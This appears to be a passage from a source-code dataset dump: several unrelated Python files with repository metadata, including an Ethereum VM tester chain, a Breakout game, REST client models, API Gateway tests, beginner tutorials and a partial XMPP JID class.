serializer = PlayerLeaderBoardSerializer(updated_player, many=False,
context={"region": region, "from_task": True}).data
layer = get_channel_layer()
async_to_sync(layer.group_send)('updates', {
'type': 'player_updates',
'content': serializer
})
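# Usage sketch, assuming a running Celery worker and Channels layer:
#     update_ranked_data.delay(player.id, region="na")
# .delay() is Celery's shorthand for .apply_async() with positional args,
# so the refresh runs off the request thread.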
| [
"[email protected]"
] | |
62cb22669072ff1e224be98f36817be8899fa801 | b3ba7762ae4e209a02bf3a47dc40ceff421087d2 | /evm/chains/tester/__init__.py | fd1cdb4b31fe590a3b5ecfd0a0e1dfd75159d7ee | [] | no_license | nicksavers/py-evm | 3c740ae328c5dd0f10c967660a4e452d257fdfa3 | 70631e3b726d093749a7315b8a4c6b1ebc4d7322 | refs/heads/master | 2021-08-15T21:35:19.556248 | 2017-11-17T21:20:24 | 2017-11-17T21:20:24 | 111,194,384 | 3 | 0 | null | 2017-11-18T09:56:00 | 2017-11-18T09:55:59 | null | UTF-8 | Python | false | false | 4,795 | py | from cytoolz import (
assoc,
)
from eth_utils import (
reversed_return,
)
from evm.chains.chain import Chain
from evm.vm.forks import (
FrontierVM as BaseFrontierVM,
HomesteadVM as BaseHomesteadVM,
EIP150VM as BaseEIP150VM,
SpuriousDragonVM as BaseSpuriousDragonVM,
)
from evm.utils.chain import (
generate_vms_by_range,
)
class MaintainGasLimitMixin(object):
@classmethod
def create_header_from_parent(cls, parent_header, **header_params):
"""
Call the parent class method maintaining the same gas_limit as the
previous block.
"""
return super(MaintainGasLimitMixin, cls).create_header_from_parent(
parent_header,
**assoc(header_params, 'gas_limit', parent_header.gas_limit)
)
class FrontierTesterVM(MaintainGasLimitMixin, BaseFrontierVM):
pass
class BaseHomesteadTesterVM(MaintainGasLimitMixin, BaseHomesteadVM):
pass
class EIP150TesterVM(MaintainGasLimitMixin, BaseEIP150VM):
pass
class SpuriousDragonTesterVM(MaintainGasLimitMixin, BaseSpuriousDragonVM):
pass
INVALID_FORK_ACTIVATION_MSG = (
"The {0}-fork activation block may not be null if the {1}-fork block "
"is non null"
)
@reversed_return
def _generate_vm_configuration(homestead_start_block=None,
dao_start_block=None,
eip150_start_block=None,
spurious_dragon_block=None):
# If no explicit configuration has been passed, configure the vm to start
# with the latest fork rules at block 0
no_declared_blocks = (
spurious_dragon_block is None and
eip150_start_block is None and
homestead_start_block is None
)
if no_declared_blocks:
yield (0, SpuriousDragonTesterVM)
if spurious_dragon_block is not None:
yield (spurious_dragon_block, SpuriousDragonTesterVM)
remaining_blocks_not_declared = (
homestead_start_block is None and
eip150_start_block is None
)
if spurious_dragon_block > 0 and remaining_blocks_not_declared:
yield (0, EIP150TesterVM)
if eip150_start_block is not None:
yield (eip150_start_block, EIP150TesterVM)
# If the EIP150 rules do not start at block 0 and homestead_start_block has not
# been configured for a specific block, configure homestead_start_block to start at
# block 0.
if eip150_start_block > 0 and homestead_start_block is None:
HomesteadTesterVM = BaseHomesteadTesterVM.configure(
dao_fork_block_number=0,
)
yield (0, HomesteadTesterVM)
if homestead_start_block is not None:
if dao_start_block is False:
# If dao_start_block support has explicitely been configured as `False` then
# mark the HomesteadTesterVM as not supporting the fork.
HomesteadTesterVM = BaseHomesteadTesterVM.configure(support_dao_fork=False)
elif dao_start_block is not None:
# Otherwise, if a specific dao_start_block fork block has been set, use it.
HomesteadTesterVM = BaseHomesteadTesterVM.configure(
dao_fork_block_number=dao_start_block,
)
else:
# Otherwise, default to the homestead_start_block block as the
# start of the dao_start_block fork.
HomesteadTesterVM = BaseHomesteadTesterVM.configure(
dao_fork_block_number=homestead_start_block,
)
yield (homestead_start_block, HomesteadTesterVM)
# If the homestead_start_block block is configured to start after block 0, set the
# frontier rules to start at block 0.
if homestead_start_block > 0:
yield (0, FrontierTesterVM)
BaseMainnetTesterChain = Chain.configure(
'MainnetTesterChain',
vm_configuration=_generate_vm_configuration()
)
class MainnetTesterChain(BaseMainnetTesterChain):
def validate_seal(self, block):
"""
We don't validate the proof of work seal on the tester chain.
"""
pass
def configure_forks(self,
homestead_start_block=None,
dao_start_block=None,
eip150_start_block=None,
spurious_dragon_block=None):
"""
TODO: add support for state_cleanup
"""
vm_configuration = _generate_vm_configuration(
homestead_start_block=homestead_start_block,
dao_start_block=dao_start_block,
eip150_start_block=eip150_start_block,
spurious_dragon_block=spurious_dragon_block,
)
self.vms_by_range = generate_vms_by_range(vm_configuration)
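# Illustration of the schedule builder above (output shapes are indicative):
if __name__ == "__main__":
    print(_generate_vm_configuration())
    # e.g. ((0, SpuriousDragonTesterVM),)
    print(_generate_vm_configuration(homestead_start_block=5,
                                     eip150_start_block=10,
                                     spurious_dragon_block=15))
    # e.g. ((0, FrontierTesterVM), (5, HomesteadTesterVM),
    #       (10, EIP150TesterVM), (15, SpuriousDragonTesterVM))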
| [
"[email protected]"
] | |
95ab80f3fc1195c06b5ffcbf8b1f17dc0ef31ab7 | 291fe7fb4cc5b682e560b0c5958e2220054451c6 | /Big41/ch4/조건문1.py | c57b278f55bd2e596e39e220b35dc5942d768772 | [] | no_license | MinksChung/BigdataCourse | 44dc5e7e578515e1dafbb7870911e09347a788f4 | 293803415da5d9f354059ea556818cc7610f36a5 | refs/heads/master | 2022-12-22T06:14:59.880933 | 2020-01-26T14:58:09 | 2020-01-26T14:58:09 | 202,575,724 | 0 | 0 | null | 2022-12-15T23:28:43 | 2019-08-15T16:29:35 | Python | UTF-8 | Python | false | false | 761 | py | # print("It's day 2 of Python.")
# age = 100
#
# if age >= 20:
#     print("You are an adult.")
# else:
#     print("You are a minor.")
# Comparison operators can also be used for string comparison.
# Control statements use a colon (:) instead of curly braces ({ }).
# When a colon is used, the next line below it must be indented.
# After indenting, you must write either the statement body or pass.
# login_id = 'root'
# if login_id == 'root':
#     print('login ok')
# else:
#     pass
jumsu = 88
if jumsu >= 90:
    print('Grade A')
elif jumsu >= 80:
    print('Grade B')
elif jumsu >= 70:
    print('Grade C')
elif jumsu >= 60:
    print('Grade D')
else:
    print('Grade F')
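# One more example: as noted above, comparison operators work on strings too.
season = 'summer'
if season == 'summer':
    print('It is hot')
else:
    print('It is not summer yet')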
| [
"[email protected]"
] | |
0412325572d786d5ff622d57872828e3ac3f1281 | d6c117812a618ff34055488337aaffea8cf81ca1 | /scenes/Breakout_Clone.py | 17e3ecd37edfce711d910432545e1bc7b564035f | [] | no_license | c0ns0le/Pythonista | 44829969f28783b040dd90b46d08c36cc7a1f590 | 4caba2d48508eafa2477370923e96132947d7b24 | refs/heads/master | 2023-01-21T19:44:28.968799 | 2016-04-01T22:34:04 | 2016-04-01T22:34:04 | 55,368,932 | 3 | 0 | null | 2023-01-22T01:26:07 | 2016-04-03T21:04:40 | Python | UTF-8 | Python | false | false | 7,869 | py | # -*- coding: utf-8 -*-
# https://gist.github.com/SebastianJarsve/5305895
# Created by Sebastian Jarsve
# 9. April 2013
from scene import *
from sound import play_effect
from random import randint
def centered_rect(x, y, w, h):
return Rect(x-w/2, y-h/2, w, h)
class Field(object):
def __init__(self):
size = screen_size
left = 0
bottom = 0
right = screen_size.w
top = screen_size.h
self.lines = [(left, bottom, left, top), (left, top, right, top), (right, top, right, bottom)]
def draw(self):
stroke_weight(4)
stroke(1,1,1)
for l in self.lines:
line(*l)
class Player(object):
def __init__(self):
self.rect = centered_rect(screen_size.w/2, 50, 100, 20)
self.lives = 3
def update(self):
self.rect.x += gravity().x * 50
self.rect.x = min(screen_size.w - 100, max(0, self.rect.x))
def draw(self):
fill(1,1,1)
rect(*self.rect)
class Ball(object):
def __init__(self):
self.rect = centered_rect(screen_size.w/2, 60, 20, 20)
self.vx = randint(-6, 6)
self.vy = 7
self.is_moving = False
def collide_with_paddle(self, paddle):
if self.rect.intersects(paddle.rect):
self.rect.y = paddle.rect.top()
self.vy *= -1
pos = self.rect.center().x - paddle.rect.center().x
self.vx = pos/10
play_effect('Jump_3')
def collide_with_block(self, block):
if self.rect.intersects(block.rect):
if self.rect.intersects(block.left):
self.rect.x = block.rect.left()-self.rect.w
self.vx = -abs(self.vx)
elif self.rect.intersects(block.right):
self.rect.x = block.rect.right()
self.vx = abs(self.vx)
elif self.rect.intersects(block.top):
self.rect.y = block.rect.top()
self.vy = abs(self.vy)
elif self.rect.intersects(block.bottom):
self.rect.y = block.rect.bottom()-self.rect.h
self.vy = -abs(self.vy)
return True
def update(self, dt):
self.rect.x += self.vx + dt*10
self.rect.y += self.vy + dt*10
if self.rect.right() >= screen_size.w:
self.rect.x = screen_size.w - self.rect.w
self.vx *= -1
play_effect('Jump_5')
if self.rect.left() <= 0:
self.rect.x = 0
self.vx *= -1
play_effect('Jump_5')
if self.rect.top() >= screen_size.h:
self.rect.y = screen_size.h - self.rect.w
self.vy *= -1
play_effect('Jump_5')
def draw(self):
fill(1,1,0)
no_stroke()
ellipse(*self.rect)
class Block(object):
def __init__(self, x, y, w, mode=1):
self.size = Size(w, 30)
self.rect = Rect(x, y, *self.size)
self.mode = mode
if self.mode > 1:
self.colour = (0.70, 0.70, 0.70)
else:
self.colour = (1,0,0)
top = self.rect.top()
left = self.rect.left()
right = self.rect.right()
bottom = self.rect.bottom()
self.left = Rect(left-5, bottom+5, 5, top-bottom-10)
self.right = Rect(right, bottom+5, 5, top-bottom-10)
self.bottom = Rect(left, bottom, right-left, 5)
self.top = Rect(left, top-5, right-left, 5)
def draw_sides(self):
fill(0,1,0)
rect(*self.left)
rect(*self.right)
rect(*self.top)
rect(*self.bottom)
def draw(self):
stroke_weight(1)
#no_stroke()
fill(*self.colour)
rect(*self.rect)
#self.draw_sides()
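# Note on Block's edge rects above: collision response picks the bounce axis
# by testing which thin edge strip (left/right/top/bottom) the ball overlaps,
# a cheap stand-in for computing an exact contact normal.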
def random_level(n=7, t=13):
level = []
for i in range(n):
level.append([])
for j in range(t):
level[i].append(randint(0, 1))
return level
level = [
[[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]],
[[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1],
[1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 2, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 0, 0, 2, 2, 2]],
random_level()
]
class Game(Scene):
def setup(self):
self.level = 1
self.field = Field()
self.player = Player()
self.ball = Ball()
self.blocks = []
self.spawn_blocks()
def spawn_blocks(self):
self.solid_blocks = []
if self.level > len(level):
lvl = len(level)-1
else:
lvl = self.level-1
for y in range(len(level[lvl])):
for x in range(len(level[lvl][y])):
w = screen_size.w/len(level[lvl][y])
mode = level[lvl][y][x]
if level[lvl][y][x] == 1:
self.blocks.append(Block(x * w, screen_size.h - (y*30+90),
w, mode))
elif level[lvl][y][x] == 2:
self.solid_blocks.append(Block(x * w, screen_size.h - (y*30+90),
w, mode))
def draw(self):
removed_blocks = set()
text('Lives: {0}'.format(self.player.lives), x=screen_size.w-45, y=screen_size.h-40)
text('Level: {0}'.format(self.level), x=45, y=screen_size.h-45)
self.field.draw()
self.player.draw()
self.player.update()
self.ball.draw()
if self.ball.is_moving:
self.ball.update(self.dt)
self.ball.collide_with_paddle(self.player)
else:
self.ball.rect.center(self.player.rect.center().x, self.player.rect.top()+10)
self.ball.line = (0, 0, 0, 0)
if self.ball.rect.top() < 0:
self.player.lives -= 1
self.ball.is_moving = False
for block in self.blocks:
block.draw()
if self.ball.is_moving:
if self.ball.collide_with_block(block):
removed_blocks.add(block)
play_effect('Hit_3')
for solid_block in self.solid_blocks:
solid_block.draw()
if self.ball.is_moving:
if self.ball.collide_with_block(solid_block):
play_effect('Ding_1')
for removed_block in removed_blocks:
self.blocks.remove(removed_block)
        if len(self.blocks) == 0:
            self.ball.is_moving = False
            self.level += 1
            # regenerate the random final level *before* spawning, so the
            # blocks are not spawned twice once the fixed levels run out
            if self.level >= len(level):
                level[-1] = random_level()
            self.spawn_blocks()
if self.player.lives == 0:
main_scene.switch_scene(GameOver())
def touch_began(self, touch):
if not self.ball.is_moving:
self.ball.is_moving = True
class GameOver(Scene):
def setup(self):
self.field = Field()
self.button = Button(Rect(screen_size.w/2-100, screen_size.h/2-50, 200, 100), 'Restart')
self.button.action = self.restart
self.add_layer(self.button)
def restart(self):
main_scene.switch_scene(Game())
def draw(self):
self.field.draw()
self.button.draw()
no_tint()
text('Game Over', x=screen_size.w/2, y=screen_size.h/4*3, font_size=64)
class MultiScene(Scene):
def __init__(self, start_scene):
self.active_scene = start_scene
run(self, PORTRAIT)
def switch_scene(self, new_scene):
self.active_scene = new_scene
self.setup()
def setup(self):
global screen_size
screen_size = self.size
self.active_scene.add_layer = self.add_layer
self.active_scene.size = self.size
self.active_scene.bounds = self.bounds
self.active_scene.setup()
def draw(self):
background(0.00, 0.25, 0.50)
self.active_scene.touches = self.touches
self.active_scene.dt = self.dt
self.active_scene.draw()
def touch_began(self, touch):
self.active_scene.touch_began(touch)
def touch_moved(self, touch):
self.active_scene.touch_moved(touch)
def touch_ended(self, touch):
self.active_scene.touch_ended(touch)
main_scene = MultiScene(Game()) | [
"[email protected]"
] | |
acafcee721e06c4272142c36a3deca0a91574319 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flashblade/FB_2_2/models/object_store_access_policy_rule.py | c48033b9db845a618c81bd67851d063292b423c6 | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 5,091 | py | # coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.2, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_2 import models
class ObjectStoreAccessPolicyRule(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'actions': 'list[str]',
'conditions': 'PolicyRuleObjectAccessCondition',
'effect': 'str',
'policy': 'FixedReference',
'resources': 'list[str]'
}
attribute_map = {
'name': 'name',
'actions': 'actions',
'conditions': 'conditions',
'effect': 'effect',
'policy': 'policy',
'resources': 'resources'
}
required_args = {
}
def __init__(
self,
name=None, # type: str
actions=None, # type: List[str]
conditions=None, # type: models.PolicyRuleObjectAccessCondition
effect=None, # type: str
policy=None, # type: models.FixedReference
resources=None, # type: List[str]
):
"""
Keyword args:
name (str): Name of the object (e.g., a file system or snapshot).
actions (list[str]): The list of actions granted by this rule. Each included action may restrict other properties of the rule. Supported actions are returned by the `/object-store-access-policy-actions` endpoint.
conditions (PolicyRuleObjectAccessCondition): Conditions used to limit the scope which this rule applies to.
effect (str): Effect of this rule. When `allow`, the rule allows the given actions to be performed on the given resources, subject to the given conditions. Valid values include `allow`.
policy (FixedReference): The policy to which this rule belongs.
resources (list[str]): The list of resources which this rule applies to. Each resource can include a bucket component, optionally followed by an object component. The choice of which components a resource can include is dictated by which actions are included in the rule. For further details, see the Object Store Access Policy Actions section of the User Guide.
"""
if name is not None:
self.name = name
if actions is not None:
self.actions = actions
if conditions is not None:
self.conditions = conditions
if effect is not None:
self.effect = effect
if policy is not None:
self.policy = policy
if resources is not None:
self.resources = resources
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ObjectStoreAccessPolicyRule`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ObjectStoreAccessPolicyRule, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ObjectStoreAccessPolicyRule):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
95ed3ebf9418039cb36fd809dcb13026d8ffb163 | 4ca6c75b8cfe7604827827aeee83b104fa7c93d9 | /tests/apigateway/tests.py | a4c13a38821d83909c9775a29a08392a8dee52c7 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | ZextrasGiacomoMattiuzzi/gordon | 3767800c64caf4444a13c15e890f84505b62296d | b6e4e8d5998c2b2c4c4edb3a2ec7124290f46e8b | refs/heads/master | 2022-12-22T02:21:09.422648 | 2020-09-16T15:03:06 | 2020-09-16T15:03:06 | 285,250,476 | 0 | 1 | NOASSERTION | 2020-08-05T10:05:08 | 2020-08-05T10:05:08 | null | UTF-8 | Python | false | false | 3,393 | py | import os
import json
import boto3
import requests
from gordon.utils_tests import BaseIntegrationTest, BaseBuildTest
from gordon.utils import valid_cloudformation_name
from gordon import utils
class IntegrationTest(BaseIntegrationTest):
def test_0001_project(self):
self._test_project_step('0001_project')
self.assert_stack_succeed('p')
self.assert_stack_succeed('r')
lambda_ = self.get_lambda(utils.valid_cloudformation_name('pyexample:hellopy'))
self.assertEqual(lambda_['Runtime'], 'python2.7')
self.assertEqual(lambda_['Description'], 'My hello description')
self.assertEqual(lambda_['MemorySize'], 192)
self.assertEqual(lambda_['Timeout'], 123)
aliases = self.get_lambda_aliases(function_name=lambda_['FunctionName'])
self.assertEqual(list(aliases.keys()), ['current'])
response = self.invoke_lambda(
function_name=lambda_['FunctionName'],
payload={}
)
self.assert_lambda_response(response, 'hello')
lambda_ = self.get_lambda(utils.valid_cloudformation_name('pyexample:byepy'))
self.assertEqual(lambda_['Runtime'], 'python2.7')
self.assertEqual(lambda_['Description'], 'My bye description')
self.assertEqual(lambda_['MemorySize'], 192)
self.assertEqual(lambda_['Timeout'], 123)
aliases = self.get_lambda_aliases(function_name=lambda_['FunctionName'])
self.assertEqual(list(aliases.keys()), ['current'])
response = self.invoke_lambda(
function_name=lambda_['FunctionName'],
payload={}
)
self.assert_lambda_response(response, 'bye')
client = boto3.client('apigateway')
api = [a for a in client.get_rest_apis()['items'] if a['name'] == 'helloapi-{}'.format(self.uid)][0]
endpoint = 'https://{}.execute-api.{}.amazonaws.com/{}'.format(api['id'], os.environ['AWS_DEFAULT_REGION'], self.uid)
response = requests.get(endpoint)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.decode('utf-8'), '"hello"')
response = requests.get('{}/404'.format(endpoint))
self.assertEqual(response.status_code, 404)
self.assertEqual(response.content.decode('utf-8'), '"hello"')
response = requests.get('{}/shop/2'.format(endpoint))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.decode('utf-8'), '"hello"')
response = requests.get('{}/http'.format(endpoint))
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content.decode('utf-8'))['args'], {'hello': 'world'})
response = requests.get('{}/complex'.format(endpoint))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.decode('utf-8'), '"hello"')
response = requests.post('{}/complex'.format(endpoint))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.decode('utf-8'), '"bye"')
class BuildTest(BaseBuildTest):
def test_0001_project(self):
self.maxDiff = None
self._test_project_step('0001_project')
self.assertBuild('0001_project', '0001_p.json')
self.assertBuild('0001_project', '0002_pr_r.json')
self.assertBuild('0001_project', '0003_r.json')
| [
"[email protected]"
] | |
2dfd45cbd4308213e05b748eeca0e94c887cb457 | b50f43c7c8cba1c0f349870596f12d1a333e6f42 | /axonius_api_client/api/json_api/lifecycle.py | 1b1fa1e637e4ac6cc877cd9a193ee9d9678de93e | [
"MIT"
] | permissive | zahediss/axonius_api_client | 190ca466e5de52a98af9b527a5d1c132fd8a5020 | 8321788df279ffb7794f179a4bd8943fe1ac44c4 | refs/heads/master | 2023-08-01T14:35:17.095559 | 2021-09-13T21:04:23 | 2021-09-13T21:04:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,301 | py | # -*- coding: utf-8 -*-
"""Models for API requests & responses."""
import dataclasses
from typing import List, Optional, Type
import marshmallow_jsonapi
from .base import BaseModel, BaseSchema, BaseSchemaJson
class LifecycleSchema(BaseSchemaJson):
"""Pass."""
last_finished_time = marshmallow_jsonapi.fields.Str(allow_none=True)
last_start_time = marshmallow_jsonapi.fields.Str(allow_none=True)
next_run_time = marshmallow_jsonapi.fields.Number(allow_none=True)
status = marshmallow_jsonapi.fields.Str()
sub_phases = marshmallow_jsonapi.fields.List(marshmallow_jsonapi.fields.Dict())
tunnel_status = marshmallow_jsonapi.fields.Str()
class Meta:
"""Pass."""
type_ = "lifecycle_schema"
@staticmethod
def get_model_cls() -> type:
"""Pass."""
return Lifecycle
@dataclasses.dataclass
class Lifecycle(BaseModel):
"""Pass."""
last_finished_time: Optional[str] = None
last_start_time: Optional[str] = None
next_run_time: Optional[str] = None
status: Optional[str] = None
sub_phases: List[dict] = dataclasses.field(default_factory=list)
tunnel_status: Optional[str] = None
@staticmethod
def get_schema_cls() -> Optional[Type[BaseSchema]]:
"""Pass."""
return LifecycleSchema
| [
"[email protected]"
] | |
26d6ddad8285870df5057d6ccabf8e80206457e9 | 95495baeb47fd40b9a7ecb372b79d3847aa7a139 | /test/test_network_address.py | d733d83fb937e590c374c7132fc314a75cc127e8 | [] | no_license | pt1988/fmc-api | b1d8ff110e12c13aa94d737f3fae9174578b019c | 075f229585fcf9bd9486600200ff9efea5371912 | refs/heads/main | 2023-01-07T09:22:07.685524 | 2020-10-30T03:21:24 | 2020-10-30T03:21:24 | 308,226,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,192 | py | # coding: utf-8
"""
Cisco Firepower Management Center Open API Specification
**Specifies the REST URLs and methods supported in the Cisco Firepower Management Center API. Refer to the version specific [REST API Quick Start Guide](https://www.cisco.com/c/en/us/support/security/defense-center/products-programming-reference-guides-list.html) for additional information.** # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.network_address import NetworkAddress # noqa: E501
from swagger_client.rest import ApiException
class TestNetworkAddress(unittest.TestCase):
"""NetworkAddress unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNetworkAddress(self):
"""Test NetworkAddress"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.network_address.NetworkAddress() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
62d0e0bb9ae6823f07924b56f20e211d04c91598 | 71dc727f9056934cd51692f8a3d26cf0dda44ef0 | /sample-programs/week6/credit_card.py | c01ecf9751b6232aa66da9be53bfaadfc1851845 | [
"MIT"
] | permissive | justinclark-dev/CSC110 | 9d255020a50bbfdb195465c3e742dd2fcd61e3a4 | d738ec33b757ba8fa9cf35b2214c184d532367a0 | refs/heads/master | 2022-12-08T08:08:30.667241 | 2020-09-04T01:05:34 | 2020-09-04T01:05:34 | 232,606,910 | 0 | 1 | MIT | 2020-09-04T02:05:47 | 2020-01-08T16:28:37 | Python | UTF-8 | Python | false | false | 2,153 | py | # credit_card.py
#
# How long will it take to pay off a credit card balance??
# This program makes use of a loop to perform a SIMULATION
# of a real-world situation.
# CSC 110
# Fall 2011
### Get and validate inputs
interest_multiplier = float(input('Enter an ANNUAL INTEREST RATE ' \
+ 'as a PERCENTAGE, >= zero: ')) / 1200.0
while interest_multiplier < 0:
interest_multiplier = float(input('TRY AGAIN -- annual ' \
+ 'rate must be >= zero: ')) / 1200.0
initial_balance = float(input('Enter an INITIAL ACCOUNT BALANCE ' \
+ 'in dollars, >= 100: '))
while initial_balance < 100:
initial_balance = float(input('TRY AGAIN -- initial balance ' \
+ 'must be >= 100: '))
payment = float(input('Enter the MONTHLY PAYMENT to be made, ' \
+ 'in dollars, >= 10: '))
while payment < 10:
payment = float(input('TRY AGAIN -- monthly payment ' \
+ 'must be >= 10: '))
### Simulate account changes until the account is paid in full
balance = initial_balance # initialize accumulator
months = 0 # initialize counter
total_payments = 0 # initialize accumulator;
# NOTICE that the loop continues as long as the balance is greater than
# zero, BUT not longer than 1200 months -- a condition necessary
# to prevent an infinite loop if the payment is too low.
while balance > 0 and months < 1200:
balance = balance + (balance * interest_multiplier)
balance -= payment
total_payments += payment
months += 1
# print(balance) # use to TRACE loop operation
years = months // 12 # integer division on purpose -- whole years only
months = months % 12
### Show results
print('\nAfter ' + str(years) + ' years and ' + str(months) + ' months')
if balance <= 0:
print('your debt is paid.')
total_payments += balance # corrects for any excess payment (balance <= 0)
print('\nTotal interest = $'
+ format((total_payments - initial_balance),',.2f') + '.')
else:
print('your debt is still not paid off!')
print('Remaining balance = $' + format(balance, ',.2f') + '.')
print('\nTotal payments = $' + format(total_payments, ',.2f') + '.\n')
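# Sample run (a sketch): with a 12% annual rate, a $1,000.00 balance and $50.00
# monthly payments, the multiplier is 12/1200 = 0.01, so month 1 ends at
# 1000*1.01 - 50 = $960.00; the simulation then reports the debt paid after
# 1 years and 11 months (23 payments in total).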
| [
"[email protected]"
] | |
fc8513bcd2fc4bdbe5be8bd006d2a3eb9c1d4e7a | ee408614842a6d4dbb5b82e9c4561cf34eec71c9 | /src/aircraft/__init__.py | e80708e9c427c76ecbd82fe6a61277c47d8a652d | [
"Apache-2.0"
] | permissive | relaxdiego/aircraft | ef0dd47d530f4abb4a4726111cc8f0d93f4b922a | ce9a6724fe33be38777991fbb1cd731e197fa468 | refs/heads/main | 2023-03-08T00:06:52.774568 | 2021-02-02T05:37:06 | 2021-02-02T05:37:06 | 290,408,644 | 10 | 1 | NOASSERTION | 2021-01-14T06:23:11 | 2020-08-26T05:56:16 | HTML | UTF-8 | Python | false | false | 74 | py | from pathlib import Path
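# Absolute path of the directory containing this package, resolved from
# this __init__.py's own location.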
aircraft_dir = (Path(__file__) / '..').resolve()
| [
"[email protected]"
] | |
52ee52ca04897359b7e695a86c8052f993618c0d | 53784d3746eccb6d8fca540be9087a12f3713d1c | /res/packages/scripts/scripts/client/messenger/proto/xmpp/jid.py | e203d8aed0708dffb0f2472e615a03256d991a33 | [] | no_license | webiumsk/WOT-0.9.17.1-CT | 736666d53cbd0da6745b970e90a8bac6ea80813d | d7c3cf340ae40318933e7205bf9a17c7e53bac52 | refs/heads/master | 2021-01-09T06:00:33.898009 | 2017-02-03T21:40:17 | 2017-02-03T21:40:17 | 80,870,824 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 6,022 | py | # 2017.02.03 21:53:47 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/messenger/proto/xmpp/jid.py
import random
import types
import time
from string import Template
from ConnectionManager import connectionManager
from ids_generators import SequenceIDGenerator
from messenger import g_settings
from messenger.proto.xmpp.xmpp_constants import XMPP_MUC_CHANNEL_TYPE
class BareJID(object):
__slots__ = ('_node', '_domain')
def __init__(self, jid = None):
super(BareJID, self).__init__()
self.setJID(jid)
def setJID(self, jid):
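        # A full JID has the form node@domain/resource: node and domain are
        # lower-cased below, and any trailing resource part is returned as tail.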
tail = ''
if not jid:
self._node, self._domain = ('', '')
elif type(jid) in types.StringTypes:
if jid.find('@') + 1:
self._node, jid = jid.split('@', 1)
self._node = self._node.lower()
else:
self._node = ''
if jid.find('/') + 1:
self._domain, tail = jid.split('/', 1)
else:
self._domain = jid
self._domain = self._domain.lower()
